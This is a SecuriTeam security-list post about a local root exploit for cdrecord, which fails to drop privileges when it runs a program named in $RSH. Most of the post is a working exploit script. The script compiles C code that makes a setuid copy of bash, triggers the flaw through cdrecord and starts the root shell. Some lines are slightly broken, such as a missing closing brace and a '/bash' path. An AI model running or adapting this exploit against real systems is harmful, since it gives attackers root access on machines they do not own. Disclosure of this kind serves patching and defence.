Top Menu

[EXPL] Cdrecord RSH SUID Shell Creation


The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: promotion

The SecuriTeam alerts list – Free, Accurate, Independent.

Get your security news from a reliable source.

Cdrecord RSH SUID Shell Creation


Max Vozeler found that the
cdrecord program, which can be installed as suid root, fails to drop euid=0
when it exec()s a program specified by the user through the $RSH environment
variable. This can be abused by a local attacker to obtain root privileges.


This shell script writes out and compiles a C application which sets it’s
UID to it’s EUID and copies a SUID shell to the current directory,
compiles it, then uses cdrecord’s use of the $RSH environment variable to
execute it. It then cleans up it’s mess and executes the shell for
*Note: This exploit is written assuming your target shell is bash

Max Vozeler is credited with discovering this vulnerability as stated in
the Mandrake Linux security advisory

Exploit Code:
# - I)ruid [CAU] (09.2004)
#  Exploits cdrecord's exec() of $RSH before dropping privs
cat > ./cpbinbash.c << __EOF__
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

main( int argc, char *argv[] ) {
        int fd1, fd2;
        int count;
        char buffer[1];

        /* Set ID's */
        setuid( geteuid() );
        setgid( geteuid() );

        /* Copy the shell */
        if ((fd1=open( "/bin/bash", O_RDONLY))<0)
                return -1;
        if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
                return -1;
        while((count=read(fd1, buffer, 1)))
                write(fd2, buffer, count);
        close( fd1 );
        close( fd2 );

        /* Priv the shell */
        chown( "./bash", geteuid(), geteuid() );
        chmod( "./bash", 3565 );

cc ./cpbinbash.c -o ./cpbinbash

# Set up environment
export RSH=./cpbinbash

# Sploit
cdrecord dev= REMOTE:CAU:1,0,0 -

# Cleanup
rm cpbinbash*
export RSHSAVE=

# Use our suid bash
/bash -p


The information in this bulletin is provided “AS IS” without warranty of any
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special